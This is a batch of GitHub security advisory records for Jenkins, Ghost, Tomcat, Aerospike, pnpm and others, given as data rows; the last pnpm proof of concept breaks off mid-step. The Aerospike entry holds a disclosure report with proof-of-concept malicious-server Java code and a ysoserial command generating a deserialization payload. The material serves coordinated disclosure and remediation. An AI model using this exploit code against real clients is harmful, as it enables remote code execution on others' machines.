{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-23T17:53:44Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-jg35-vf67-gg2j
|
2023-08-16T21:05:51Z
|
2023-08-16T15:30:18Z
| null |
['CVE-2023-40346']
|
Jenkins Shortcut Job Plugin stored cross-site scripting vulnerability
|
Jenkins Shortcut Job Plugin 0.4 and earlier does not escape the shortcut redirection URL.
This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure shortcut jobs.
Shortcut Job Plugin 0.5 escapes the shortcut redirection URL.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.plugins:shortcut-job'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40346'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-3071'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:05:51Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-9c9v-w225-v5rg
|
2023-08-23T17:19:50Z
|
2023-08-15T20:35:20Z
| null |
['CVE-2023-40028']
|
Ghost vulnerable to arbitrary file read via symlinks in content import
|
### Impact
A vulnerability in Ghost allows authenticated users to upload files which are symlinks. This can be exploited to perform an arbitrary file read of any file on the operating system.
Site administrators can check for exploitation of this issue by looking for unknown symlinks within Ghost's `content/` folder
### Vulnerable versions
This security vulnerability is present in Ghost ≤ v5.59.0.
### Patches
v5.59.1 contains a fix for this issue.
### For more information
If you have any questions or comments about this advisory:
* Email us at [security@ghost.org](mailto:security@ghost.org)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'ghost'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.59.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/security/advisories/GHSA-9c9v-w225-v5rg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40028'}, {'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/commit/690fbf3f7302ff3f77159c0795928bdd20f41205'}, {'type': 'PACKAGE', 'url': 'https://github.com/TryGhost/Ghost'}]
|
{'cwe_ids': ['CWE-22', 'CWE-59'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-15T20:35:20Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-q3mw-pvr8-9ggc
|
2023-08-31T18:50:44Z
|
2023-08-25T21:30:48Z
| null |
['CVE-2023-41080']
|
Apache Tomcat Open Redirect vulnerability
|
URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92.
The vulnerability is limited to the ROOT (default) web application.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0-M1'}, {'fixed': '11.0.0-M11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.1.0-M1'}, {'fixed': '10.1.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0-M1'}, {'fixed': '9.0.80'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.0'}, {'fixed': '8.5.93'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.0'}, {'fixed': '8.5.93'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0-M1'}, {'fixed': '9.0.80'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.1.0-M1'}, {'fixed': '10.1.13'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0-M1'}, {'fixed': '11.0.0-M11'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-41080'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/4998ad745b67edeadefe541c94ed029b53933d3b'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/77c0ce2d169efa248b64b992e547aad549ec906b'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/bb4624a9f3e69d495182ebfa68d7983076407a27'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/e3703c9abb8fe0d5602f6ba8a8f11d4b6940815a'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/tomcat'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/71wvwprtx2j2m54fovq9zr7gbm2wow2f'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230921-0006/'}]
|
{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-25T22:05:01Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-w5gq-xrrp-3fxf
|
2023-08-21T19:33:09Z
|
2023-08-14T18:32:59Z
| null |
['CVE-2023-0872']
|
OpenNMS privilege elevation vulnerability
|
The Horizon REST API includes a users endpoint in OpenNMS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple platforms is vulnerable to elevation of privilege. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet.
OpenNMS thanks Erik Wynter for reporting this issue.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:L'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms-webapp-rest'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '31.0.8'}, {'fixed': '32.0.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0872'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/6354'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/commit/e59b0ddd164cf0598ac0294d11a2d677d9e310b8'}, {'type': 'WEB', 'url': 'https://docs.opennms.com/horizon/32/releasenotes/changelog.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenNMS/opennms'}]
|
{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-14T21:12:00Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-8697-479h-5mfp
|
2023-08-24T21:49:43Z
|
2023-08-22T18:03:13Z
| null |
['CVE-2023-38976']
|
Weaviate denial of service vulnerability
|
### Impact
This vulnerability is a type conversion issue that affects users of Weaviate Server versions 1.20.0 and earlier.
Who is impacted: Users of Weaviate Server versions 1.20.0 and earlier are impacted by this vulnerability.
### Patches
A patch has been developed for this vulnerability.
Patch releases 1.20.6, 1.19.13, and 1.18.6 are fixing this vulnerability in each respective minor version release.
Users are strongly recommended to upgrade to one of these patched versions to address the vulnerability.
Keeping software up-to-date is crucial to avoid security vulnerabilities.
### Workarounds
There are no known workarounds to fix or remediate this vulnerability without upgrading.
Users must upgrade to a patched version to mitigate the risk.
### References
* https://github.com/weaviate/weaviate/releases/tag/v1.18.6
* https://github.com/weaviate/weaviate/releases/tag/v1.19.13
* https://github.com/weaviate/weaviate/releases/tag/v1.20.6
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/weaviate/weaviate'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.20.0'}, {'fixed': '1.20.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/weaviate/weaviate'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.19.0'}, {'fixed': '1.19.13'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/weaviate/weaviate'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.18.6'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/security/advisories/GHSA-8697-479h-5mfp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38976'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/issues/3258'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/pull/3431'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/commit/2a7b208d9aca07e28969e3be82689c184ccf9118'}, {'type': 'PACKAGE', 'url': 'https://github.com/weaviate/weaviate'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/releases/tag/v1.18.6'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/releases/tag/v1.19.13'}, {'type': 'WEB', 'url': 'https://github.com/weaviate/weaviate/releases/tag/v1.20.6'}]
|
{'cwe_ids': ['CWE-704'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-22T18:03:13Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-jj95-55cr-9597
|
2023-08-08T22:15:13Z
|
2023-08-03T19:45:39Z
| null |
['CVE-2023-36480']
|
Aerospike Java Client vulnerable to unsafe deserialization of server responses
|
# GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2023-044`
The [GitHub Security Lab](https://securitylab.github.com) team has identified a potential security vulnerability in [Aerospike Java Client](https://github.com/aerospike/aerospike-client-java/).
We are committed to working with you to help resolve this issue. In this report you will find everything you need to effectively coordinate a resolution of this issue with the GHSL team.
If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at `securitylab@github.com` (please include `GHSL-2023-044` as a reference).
If you are _NOT_ the correct point of contact for this report, please let us know!
## Summary
The Aerospike Java client is a Java application that implements a network protocol to communicate with an Aerospike server. Some of the messages received from the server contain Java objects that the client deserializes when it encounters them without further validation. Attackers that manage to trick clients into communicating with a malicious server can include especially crafted objects in its responses that, once deserialized by the client, force it to execute arbitrary code. This can be abused to take control of the machine the client is running on.
## Product
Aerospike Java Client
## Tested Version
[6.1.7](https://github.com/aerospike/aerospike-client-java/releases/tag/6.1.7)
## Details
### Issue: Unsafe deserialization of server responses (`GHSL-2023-044`)
The Aerospike Java client implements different ways of communicating with an Aerospike server to perform several operations. Asynchronous commands can be executed using the Netty framework using the `NettyCommand` class. This class includes an `InboundHandler` that extends Netty's `ChannelInboundHandlerAdapter`, which handles inbound data coming from the Netty channel established with the server. This is implemented in the `channelRead` method:
[`client/src/com/aerospike/client/async/NettyCommand.java:1157`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157)
```java
@Override
public void channelRead(ChannelHandlerContext ctx, Object msg) {
command.read((ByteBuf)msg);
}
```
The incoming `msg` object is handled by the `NettyCommand.read` method, which behaves differently depending on the `state` variable. Several states produce paths to the vulnerable code — for instance, we will follow the path through `AsyncCommand.COMMAND_READ_HEADER`:
[`/client/src/com/aerospike/client/async/NettyCommand.java:489`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489)
```java
private void read(ByteBuf byteBuffer) {
eventReceived = true;
try {
switch (state) {
// --snip--
case AsyncCommand.COMMAND_READ_HEADER:
if (command.isSingle) {
readSingleHeader(byteBuffer);
}
// --snip--
}
// --snip--
}
// --snip---
}
```
Some bytes are read from the message buffer and saved in `command.dataBuffer` in the `readSingleHeader` method, after which `parseSingleBody` is called:
[`client/src/com/aerospike/client/async/NettyCommand.java:596`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596)
```java
private void readSingleHeader(ByteBuf byteBuffer) {
int readableBytes = byteBuffer.readableBytes();
int dataSize = command.dataOffset + readableBytes;
// --snip--
byteBuffer.readBytes(command.dataBuffer, 0, dataSize);
command.dataOffset = dataSize;
if (command.dataOffset >= receiveSize) {
parseSingleBody();
}
}
```
`parseSingleBody` simply delegates on `AsyncCommand.parseCommandResult`, which unless the message is compressed, directly calls `AsyncCommand.parseResult`. The implementation of this method depends on the command type. For an `AsyncRead` command, we have the following:
[`client/src/com/aerospike/client/async/AsyncRead.java:68`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68)
```java
@Override
protected final boolean parseResult() {
validateHeaderSize();
int resultCode = dataBuffer[dataOffset + 5] & 0xFF;
int generation = Buffer.bytesToInt(dataBuffer, dataOffset + 6);
int expiration = Buffer.bytesToInt(dataBuffer, dataOffset + 10);
int fieldCount = Buffer.bytesToShort(dataBuffer, dataOffset + 18);
int opCount = Buffer.bytesToShort(dataBuffer, dataOffset + 20);
dataOffset += Command.MSG_REMAINING_HEADER_SIZE;
if (resultCode == 0) {
// --snip--
skipKey(fieldCount);
record = parseRecord(opCount, generation, expiration, isOperation);
return true;
}
```
It can be seen that several fields are read from the message's bytes, and then a call to `Command.parseRecord` happens:
[`client/src/com/aerospike/client/command/Command.java:2083`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083)
```java
protected final Record parseRecord(
int opCount,
int generation,
int expiration,
boolean isOperation
) {
Map<String,Object> bins = new LinkedHashMap<>();
for (int i = 0 ; i < opCount; i++) {
int opSize = Buffer.bytesToInt(dataBuffer, dataOffset);
byte particleType = dataBuffer[dataOffset + 5];
byte nameSize = dataBuffer[dataOffset + 7];
String name = Buffer.utf8ToString(dataBuffer, dataOffset + 8, nameSize);
dataOffset += 4 + 4 + nameSize;
int particleBytesSize = opSize - (4 + nameSize);
Object value = Buffer.bytesToParticle(particleType, dataBuffer, dataOffset, particleBytesSize);
```
`Buffer.bytesToParticle` converts the remaining bytes in the data buffer depending on the `particleType` field. We're interested in the `JBLOB` case:
[`client/src/com/aerospike/client/command/Buffer.java:53`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53)
```java
public static Object bytesToParticle(int type, byte[] buf, int offset, int len)
throws AerospikeException {
switch (type) {
// --snip--
case ParticleType.JBLOB:
return Buffer.bytesToObject(buf, offset, len);
```
In `bytesToObject`, the deserialization of an object from the message bytes happens:
[`client/src/com/aerospike/client/command/Buffer.java:300`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L300)
```java
public static Object bytesToObject(byte[] buf, int offset, int length) {
// --snip--
try (ByteArrayInputStream bastream = new ByteArrayInputStream(buf, offset, length)) {
try (ObjectInputStream oistream = new ObjectInputStream(bastream)) {
return oistream.readObject();
}
}
// --snip--
}
```
NOTE: Take into account that there exists a similar sink, that can be reached in a similar way, in `Unpacker.unpackBlock`:
[`client/src/com/aerospike/client/util/Unpacker.java:227`](https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227)
```java
private T unpackBlob(int count) throws IOException, ClassNotFoundException {
// --snip--
case ParticleType.JBLOB:
// --snip--
try (ByteArrayInputStream bastream = new ByteArrayInputStream(buffer, offset, count)) {
try (ObjectInputStream oistream = new ObjectInputStream(bastream)) {
val = getJavaBlob(oistream.readObject());
}
}
```
This vulnerability was discovered with the help of [CodeQL](https://codeql.github.com/).
#### Impact
This issue may lead to Remote Code Execution (RCE) in the Java client.
#### Remediation
Avoid deserialization of untrusted data if at all possible. If the architecture permits it then use other formats instead of serialized objects, for example JSON or XML. However, these formats should not be deserialized into complex objects because this provides further opportunities for attack. For example, XML-based deserialization attacks are possible through libraries such as XStream and XmlDecoder.
Alternatively, a tightly controlled whitelist can limit the vulnerability of code but be aware of the existence of so-called Bypass Gadgets, which can circumvent such protection measures.
#### Resources
To exploit this vulnerability, a malicious Aerospike server is needed. For the sake of simplicity, we implemented a mock server with hardcoded responses, with the only goal of reaching the vulnerable code of the client. To be able to easily reproduce this, we used the client's examples with the `-netty` flag, specifically the `AsyncPutGet`, which uses an `AsyncRead`. The examples point to `localhost:3000` by default, so we set up a simple Netty TCP server listening on that port, which replicates responses previously intercepted from a real Aerospike server and returns them to the client, until the `AsyncRead` command happens. Then, our server injects the malicious response:
```java
public class AttackChannelHandler extends SimpleChannelInboundHandler<String> {
@Override
protected void channelRead0(ChannelHandlerContext ctx, String s) throws Exception {
// --snip--
if (s.getBytes()[7] == 0x44) {
AttackMessage m = new AttackMessage(
Files.readAllBytes(Paths.get("location/of/deserialization/payload.bin")));
ctx.channel().writeAndFlush(m);
return;
}
// --snip--
}
}
```
`AttackMessage` is a class that hardcodes the necessary data to deliver the payload:
```java
public class AttackMessage {
private byte resultCode = 0;
private int generation = 2;
private int expiration = 417523457;
private short fieldCount = 0;
private short opCount = 1;
private byte particleType = 7;
private String name = "putgetbin";
private byte[] payload;
public AttackMessage(byte[] payload) {
this.payload = payload;
}
// --snip-- (getters)
public int[] getSize() {
int size = 30 + name.length() + payload.length;
int low = (byte) (size & 0xFF);
int high = (byte) (size >> 8) & 0xFF;
return new int[] {high, low};
}
public int getOpSize() {
return payload.length + 4 + name.length();
}
public byte[] getPayload() {
return payload;
}
}
```
And it's finally encoded and delivered to the client through the network using a `MessageToByteEncoder` from Netty:
```java
public class AttackMessageEncoder extends MessageToByteEncoder<AttackMessage> {
@Override
protected void encode(ChannelHandlerContext ctx, AttackMessage msg, ByteBuf out)
throws Exception {
// header
out.writeBytes(new byte[] {0x02, 0x03, 0x00, 0x00, 0x00, 0x00});
int[] length = msg.getSize();
out.writeByte(length[0]);
out.writeByte(length[1]);
out.writeBytes(new byte[] {0x16, 0x00, 0x00, 0x00, 0x00});
out.writeByte(msg.getResultCode());
out.writeInt(msg.getGeneration());
out.writeInt(msg.getExpiration());
out.writeBytes(new byte[] {0x00, 0x00, 0x00, 0x00});
out.writeShort(msg.getFieldCount());
out.writeShort(msg.getOpCount());
out.writeInt(msg.getOpSize());
out.writeByte(0x01);
out.writeByte(msg.getParticleType());
out.writeByte(0x00);
out.writeByte(msg.getName().length());
out.writeCharSequence(msg.getName(), Charset.defaultCharset());
out.writeBytes(msg.getPayload());
}
}
```
The specific deserialization payload that needs to be used depends on the deserialization gadgets available in the classpath of the application using the Aerospike client. Again, for simplicity, we assumed the victim application uses Apache Commons Collections 4.0, which contains a well-known deserialization gadget:
```xml
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-collections4</artifactId>
<version>4.0</version>
</dependency>
```
In which case, the malicious payload file could be generated using [`ysoserial`](https://github.com/frohoff/ysoserial) as follows:
```
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 '/System/Applications/Calculator.app/Contents/MacOS/Calculator' > payload.bin
```
## GitHub Security Advisories
We recommend you create a private [GitHub Security Advisory](https://help.github.com/en/github/managing-security-vulnerabilities/creating-a-security-advisory) for this finding. This also allows you to invite the GHSL team to collaborate and further discuss this finding in private before it is [published](https://help.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory).
## Credit
This issue was discovered and reported by the GitHub CodeQL team members [@atorralba (Tony Torralba)](https://github.com/atorralba) and [@joefarebrother (Joseph Farebrother)](https://github.com/joefarebrother).
## Contact
You can contact the GHSL team at `securitylab@github.com`, please include a reference to `GHSL-2023-044` in any communication regarding this issue.
## Disclosure Policy
This report is subject to our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.aerospike:aerospike-client'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.2.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.aerospike:aerospike-client'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.aerospike:aerospike-client'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.5.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/security/advisories/GHSA-jj95-55cr-9597'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36480'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/commit/02bf28e62fb186f004c82c87b219db2fc5b8262a'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/commit/51c65e32837da29435161a2d9c09bbdc2071ecae'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/commit/66aafb4cd743cf53baffaeaf69b035f51d2e2e36'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/commit/80c508cc5ecb0173ce92d7fab8cfab5e77bd9900'}, {'type': 'PACKAGE', 'url': 'https://github.com/aerospike/aerospike-client-java'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/AsyncRead.java#L68'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L1157'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L489'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/async/NettyCommand.java#L596'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Buffer.java#L53'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/command/Command.java#L2083'}, {'type': 'WEB', 'url': 'https://github.com/aerospike/aerospike-client-java/blob/e40a49b3db0d2b3d45068910e1cb9d917c795315/client/src/com/aerospike/client/util/Unpacker.java#L227'}, {'type': 'WEB', 'url': 'https://support.aerospike.com/s/article/CVE-2023-36480-Aerospike-Java-Client-vulnerable-to-unsafe-deserialization-of-server-responses'}]
|
{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T19:45:39Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-37xq-q42p-rv3p
|
2023-08-24T22:18:39Z
|
2023-08-24T22:18:39Z
| null |
[]
|
ntpd has Dependency on Vulnerable Third-Party Component
|
### During startup, an attacker that can man-in-the-middle traffic to and from NTS key exchange servers can trigger a very expensive key validation process due to a vulnerability in webpki.
### Impact
This vulnerability can lead to excessive cpu usage on startup on clients configured to use NTS
### Patches
Affected users are recommended to upgrade to version 0.3.7
### References
See also https://github.com/rustsec/advisory-db/blob/main/crates/rustls-webpki/RUSTSEC-2023-0053.md
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L'}]
|
[{'package': {'ecosystem': 'crates.io', 'name': 'ntpd'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.7'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pendulum-project/ntpd-rs/security/advisories/GHSA-37xq-q42p-rv3p'}, {'type': 'WEB', 'url': 'https://github.com/pendulum-project/ntpd-rs/commit/927952a440176a18f3ded132eb831ae7f7ac5c00'}, {'type': 'PACKAGE', 'url': 'https://github.com/pendulum-project/ntpd-rs'}, {'type': 'WEB', 'url': 'https://github.com/rustsec/advisory-db/blob/main/crates/rustls-webpki/RUSTSEC-2023-0053.md'}]
|
{'cwe_ids': ['CWE-1395'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-08-24T22:18:39Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-c2cc-3569-6jh2
|
2023-09-06T21:05:41Z
|
2023-08-31T00:30:17Z
| null |
['CVE-2023-39138']
|
Path traversal in ZIPFoundation
|
An issue in ZIPFoundation v0.9.16 allows attackers to execute a path traversal via extracting a crafted zip file.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'purl-type:swift', 'name': 'https://github.com/weichsel/ZIPFoundation'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.9.16'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39138'}, {'type': 'WEB', 'url': 'https://github.com/weichsel/ZIPFoundation/issues/282'}, {'type': 'WEB', 'url': 'https://blog.ostorlab.co/zip-packages-exploitation.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/weichsel/ZIPFoundation'}, {'type': 'WEB', 'url': 'https://ostorlab.co/vulndb/advisory/OVE-2023-4'}, {'type': 'WEB', 'url': 'https://ostorlab.co/vulndb/advisory/OVE-2023-6'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-31T01:44:43Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-5r98-f33j-g8h7
|
2023-08-01T17:00:55Z
|
2023-08-01T17:00:55Z
| null |
['CVE-2023-37478']
|
pnpm incorrectly parses tar archives relative to specification
|
### Summary
It is possible to construct a tarball that, when installed via npm or parsed by the registry is safe, but when installed via pnpm is malicious, due to how pnpm parses tar archives.
### Details
The TAR format is an append-only archive format, and as such, the specification for how to update a file is to add a new record to the end with the updated version of the file. This means that it is completely valid for an archive to contain multiple copies of, say, `package.json`, and the expected behavior when extracting is that all versions other than the last get ignored.
This is further complicated by that during tarball extraction, all package managers are configured to drop the first path component, so collisions can be created simply by using multiple root folders in the archive, even without performing updates.
When pnpm extracts a tar archive via tar-stream, it appears to extract only the _first_ file of a given name and discards all subsequent files with the same name.
### PoC
Create a root folder with the following layout:
- `a/package.json`
- `package/package.json`
- `z/package.json`
File contents:
#### a/package.json
```json
{
"name": "test-package",
"version": "0.1.0",
"description": "This is a bad version of a test package",
"dependencies": {
"react": "^15"
}
}
```
#### package/package.json
```json
{
"name": "test-package",
"version": "0.1.0",
"description": "This is a bad version of a test package",
"dependencies": {
"react": "^16"
}
}
```
#### z/package.json
```json
{
"name": "test-package",
"version": "0.1.0",
"description": "This is the good version of a test package",
"dependencies": {
"react": "^17"
}
}
```
Then use the tar binary to produce a tarball (working directory is the root folder):
